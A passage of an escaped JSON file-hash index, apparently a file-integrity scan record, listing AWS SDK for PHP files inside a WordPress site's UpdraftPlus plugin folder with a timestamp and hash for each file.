src\\/Aws\\/S3\\/Enum\\/Group.php\":{\"d\":1545638163,\"h\":\"96d2fcdffb966c8e411fe630e10b5fc8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/Permission.php\":{\"d\":1545638163,\"h\":\"d9a0af6b2cdc229239b047f23d838cff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/Storage.php\":{\"d\":1545638163,\"h\":\"0266e6eb192fc241d3748d3ac04def25\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/Protocol.php\":{\"d\":1545638163,\"h\":\"d97f9232bba001d3bf6ec41259636670\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/GranteeType.php\":{\"d\":1545638163,\"h\":\"b7897dc9b95f94f6b121dd6f5e28bc8f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/Payer.php\":{\"d\":1545638163,\"h\":\"e25af5161310f4c6e3bd10063861d69e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/StorageClass.php\":{\"d\":1545638163,\"h\":\"813636035d4e3c256791152d0e3ec8ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/EncodingType.php\":{\"d\":1545638163,\"h\":\"a7cde485ca7ac5f211f0f1a842d8be6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/Event.php\":{\"d\":1545638163,\"h\":\"1bb29324b69f9431e60583652916f2dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/MFADelete.php\":{\"d\":1545638163,\"h\":\"21617876155e75c94b8bc6f8380aec16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/MetadataDirective.php\":{\"d\":1545638163,\"h\":\"274e400686bd9a855a74c7f90554fb61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/ServerSideEncryption.php\":{\"d\":1545638163,\"h\":\"48d3a44084406aff1541a5defe9320f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/S3SignatureInterface.php\":{\"d\":1545638163,\"h\":\"38b32ba608f23cf157a4d9782f47d6f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/StreamWrapper.php\":{\"d\":1545638163,\"h\":\"dce729353d53b9ce563baffff3e797eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/IncompleteMultipartUploadChecker.php\":{\"d\":1545638163,\"h\":\"e181099ab8c3574e9d610109832f6d5e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/SseCpkListener.php\":{\"d\":1545638163,\"h\":\"9577868d44c40ea046d38917c736d416\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/SocketTimeoutChecker.php\":{\"d\":1545638163,\"h\":\"c6af6b2766ebf5dced00b8097c480861\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/BucketStyleListener.php\":{\"d\":1545638163,\"h\":\"9d7022c32b9b88fccc6f36b0789fca09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/S3Md5Listener.php\":{\"d\":1545638163,\"h\":\"61a2a32166a1ca9f0897c31644b17f05\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/S3Client.php\":{\"d\":1545638163,\"h\":\"69f146a4d4256c6e611f47904a759f5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/AcpListener.php\":{\"d\":1545638163,\"h\":\"30021c2e042185e138475242fc778cf7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/ResumableDownload.php\":{\"d\":1545638163,\"h\":\"c2c0b6848e5766e351fc5bf0cc5ba308\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/S3Signature.php\":{\"d\":1545638163,\"h\":\"20820eeb37e5dd045ba91455fc64a088\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/S3SignatureV4.php\":{\"d\":1545638163,\"h\":\"3f2120c87ce46b2cffbaefdf5b4e00ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Credentials\\/AbstractCredentialsDecorator.php\":{\"d\":1545638163,\"h\":\"bce6a394352ce1162ed5d5a814a921e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Credentials\\/CredentialsInterface.php\":{\"d\":1545638163,\"h\":\"93e9ebe9c22c382ea50b36951b978583\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Credentials\\/NullCredentials.php\":{\"d\":1545638163,\"h\":\"a72c382e6050484406ff0813d6879c4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Credentials\\/RefreshableInstanceProfileCredentials.php\":{\"d\":1545638163,\"h\":\"d1a055b46efc21e46ccc4ca731ffe7ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Credentials\\/AbstractRefreshableCredentials.php\":{\"d\":1545638163,\"h\":\"6b235c74969a4c6808d7cff23bc93df7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Credentials\\/Credentials.php\":{\"d\":1545638163,\"h\":\"dc038b73d9ca995536bc03e80b615a4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Credentials\\/CacheableCredentials.php\":{\"d\":1545638163,\"h\":\"3b6c2d61dbacea5a25d8e8477cf1d2c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/Parser\\/JsonRestExceptionParser.php\":{\"d\":1545638163,\"h\":\"942c6b749df09392fb4e302bc9d0af8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/Parser\\/ExceptionParserInterface.php\":{\"d\":1545638163,\"h\":\"09a7643cba57df1eac684aaf13ee55a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/Parser\\/JsonQueryExceptionParser.php\":{\"d\":1545638163,\"h\":\"3bd5164dd7e0bc8419d09bc40132146f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/Parser\\/AbstractJsonExceptionParser.php\":{\"d\":1545638163,\"h\":\"fcff52403d7baf7d5115ee56cb7b260d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/Parser\\/DefaultXmlExceptionParser.php\":{\"d\":1545638163,\"h\":\"e5da40fe5908360f0713e38e9af9b437\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/UnexpectedValueException.php\":{\"d\":1545638163,\"h\":\"830809ef2d18c043d65f182be99c07b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/ExceptionListener.php\":{\"d\":1545638163,\"h\":\"2ca2ab488369e279da53a7b903fd557e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/RequiredExtensionNotLoadedException.php\":{\"d\":1545638163,\"h\":\"2947ebcfe2e8e786b51abfa8a722e899\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/RuntimeException.php\":{\"d\":1545638163,\"h\":\"6942bba7cab741eb2e5ce4d396a82095\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/MultipartUploadException.php\":{\"d\":1545638163,\"h\":\"3161352ca49918ea3783888aa8f0d7bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/OverflowException.php\":{\"d\":1545638163,\"h\":\"5a565642fb5379392dd5752c3adb16ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/OutOfBoundsException.php\":{\"d\":1545638163,\"h\":\"dabab81d1c1db56dcab8eeb513e18d5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/InvalidArgumentException.php\":{\"d\":1545638163,\"h\":\"6400656e6a65bd523e37158ed71bd4c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/LogicException.php\":{\"d\":1545638163,\"h\":\"d20e53d676891f9142be744f2aab2e6d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/TransferException.php\":{\"d\":1545638163,\"h\":\"92ae697629eeff344aa6517b5bc45d40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/AwsExceptionInterface.php\":{\"d\":1545638163,\"h\":\"b5e48ce90ddfd2b397fe1dfbabd2d3ca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/BadMethodCallException.php\":{\"d\":1545638163,\"h\":\"752cafcafecfd520e6ccfe01210a17c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/ServiceResponseException.php\":{\"d\":1545638163,\"h\":\"053e3c76a4e889978a24734874ed24ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/DomainException.php\":{\"d\":1545638163,\"h\":\"1b1e3665960ce4fb9043df5c58553dd6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/ExceptionFactoryInterface.php\":{\"d\":1545638163,\"h\":\"ed60e5bba6ad952a2619613e194fb73c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/InstanceProfileCredentialsException.php\":{\"d\":1545638163,\"h\":\"992185ed8296289a27b1b6497f306643\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Exception\\/NamespaceExceptionFactory.php\":{\"d\":1545638163,\"h\":\"5fcea4d30864e65dbb0482a7ada2a42e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Command\\/XmlResponseLocationVisitor.php\":{\"d\":1545638163,\"h\":\"457a7a69d3575bf45afc227ca0fd3948\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Command\\/AwsQueryVisitor.php\":{\"d\":1545638163,\"h\":\"640e0b6993bd8faaa3e154dc988d02e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Command\\/QueryCommand.php\":{\"d\":1545638163,\"h\":\"47f1c01448de7d6c09671907bef5a5bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Command\\/JsonCommand.php\":{\"d\":1545638163,\"h\":\"6bef8308125e047c4be353e04c067367\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/InstanceMetadata\\/Waiter\\/ServiceAvailable.php\":{\"d\":1545638163,\"h\":\"c1e9ef2e441a99fbf966313fd3beac0e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/InstanceMetadata\\/InstanceMetadataClient.php\":{\"d\":1545638163,\"h\":\"bd565975d0da1ed56726390ea606d128\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Iterator\\/AwsResourceIteratorFactory.php\":{\"d\":1545638163,\"h\":\"434d553b94a81064f2abb38586b7319c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Iterator\\/AwsResourceIterator.php\":{\"d\":1545638163,\"h\":\"d17d86d899862bf9ff93926fdfa68326\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Client\\/AwsClientInterface.php\":{\"d\":1545638163,\"h\":\"b5549e525d4119198840bb2b34e79c67\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Client\\/ThrottlingErrorChecker.php\":{\"d\":1545638163,\"h\":\"18150232988131e9f21e4724cfc35bbf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Client\\/UserAgentListener.php\":{\"d\":1545638163,\"h\":\"98501807352bf33024e31b7fc6217c93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Client\\/DefaultClient.php\":{\"d\":1545638163,\"h\":\"f5c71745baaae8f46fe37a4f3d4bbd9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Client\\/ExpiredCredentialsChecker.php\":{\"d\":1545638163,\"h\":\"fa88950bb0efaf957f4b8ee10753062b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Client\\/AbstractClient.php\":{\"d\":1545638163,\"h\":\"c11afaf45daf193c51cb7befe463f5d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Client\\/ClientBuilder.php\":{\"d\":1545638163,\"h\":\"11cd9b87c4d9f0241ca71cf0d2d7293f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Client\\/UploadBodyListener.php\":{\"d\":1545638163,\"h\":\"db13af3fbec0f198c0120bd0690e935d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Hash\\/HashUtils.php\":{\"d\":1545638163,\"h\":\"195b3c61ae75615f25a79b04a7ad5090\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Hash\\/TreeHash.php\":{\"d\":1545638163,\"h\":\"e876a9bd16c09bb5f6116b3a05ea4da2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Hash\\/ChunkHashInterface.php\":{\"d\":1545638163,\"h\":\"d5e3f4e9cd7cdbccab266444d4a46b9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Hash\\/ChunkHash.php\":{\"d\":1545638163,\"h\":\"31d493b2e4175c5964bb6f4da4e8cce2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Model\\/MultipartUpload\\/AbstractUploadBuilder.php\":{\"d\":1545638163,\"h\":\"3e903d08159840e4d05865fedf651ce9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Model\\/MultipartUpload\\/AbstractTransfer.php\":{\"d\":1545638163,\"h\":\"f00f833de3a6694a7758a79042cb2b8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Model\\/MultipartUpload\\/AbstractUploadId.php\":{\"d\":1545638163,\"h\":\"987faac50f83d46f2097737dc40052ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Model\\/MultipartUpload\\/AbstractTransferState.php\":{\"d\":1545638163,\"h\":\"f4391e22c27455420d9c85cbca4754e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Model\\/MultipartUpload\\/AbstractUploadPart.php\":{\"d\":1545638163,\"h\":\"5c5bbfb146b5297ff733b7ebb61cd106\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Model\\/MultipartUpload\\/UploadIdInterface.php\":{\"d\":1545638163,\"h\":\"2705f41724fc5e736c802e323bdc0a2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Model\\/MultipartUpload\\/TransferInterface.php\":{\"d\":1545638163,\"h\":\"94130e826c600d19e974e269ee71065a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Model\\/MultipartUpload\\/TransferStateInterface.php\":{\"d\":1545638163,\"h\":\"7a52b1befbad56b3362315f92e0f31b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Model\\/MultipartUpload\\/UploadPartInterface.php\":{\"d\":1545638163,\"h\":\"13ae3e96adc690d71bdfde1bdf01c7f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Signature\\/SignatureListener.php\":{\"d\":1545638163,\"h\":\"ea59c6544367b58bc8c7026507cba813\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Signature\\/EndpointSignatureInterface.php\":{\"d\":1545638163,\"h\":\"49198ab55607a67bb4fbd942d3d8db2e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Signature\\/AbstractSignature.php\":{\"d\":1545638163,\"h\":\"66bd700361a97f1f669b225f6c0e20b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Signature\\/SignatureInterface.php\":{\"d\":1545638163,\"h\":\"e05714bb1ddd85ff922bc5182d97019d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Signature\\/SignatureV2.php\":{\"d\":1545638163,\"h\":\"2208c5cb329130578b52ad9cd1c75aa8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Signature\\/SignatureV3Https.php\":{\"d\":1545638163,\"h\":\"2ee7fe57e0e3e76be633e6094e89b9fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Signature\\/SignatureV4.php\":{\"d\":1545638163,\"h\":\"e4ce3f0d0ec24c17befe08a3de950eb4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Resources\\/public-endpoints.php\":{\"d\":1545638163,\"h\":\"29401fe00b388045fc5bccb45f04a274\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Resources\\/sdk1-config.php\":{\"d\":1545638163,\"h\":\"e0b5e5dfab92d4e8d8945e553dec9e1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Resources\\/aws-config.php\":{\"d\":1545638163,\"h\":\"a8c87fc3f631318ff581804a61001ac3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Waiter\\/CompositeWaiterFactory.php\":{\"d\":1545638163,\"h\":\"73f2bab0a7aa293901dcd181498135f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Waiter\\/WaiterConfigFactory.php\":{\"d\":1545638163,\"h\":\"ac6bd930f61ae6b6689edc78562778b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Waiter\\/WaiterConfig.php\":{\"d\":1545638163,\"h\":\"a9048fb9d65c13ebbc33309550bd1f04\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Waiter\\/AbstractWaiter.php\":{\"d\":1545638163,\"h\":\"1fe7cf8dfd60c6c3f534f488d943160e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Waiter\\/ConfigResourceWaiter.php\":{\"d\":1545638163,\"h\":\"68faf7fde5fb769e3462b4d8e870da9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Waiter\\/WaiterClassFactory.php\":{\"d\":1545638163,\"h\":\"97e1f94b23346b80b7f6ec5d8906ecec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/Common\\/Waiter\\/AbstractResourceWaiter.php\":{\"d\":1545638163,\"h\":\"fb87fdb0773a67d0c4ea4741a3057974\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/a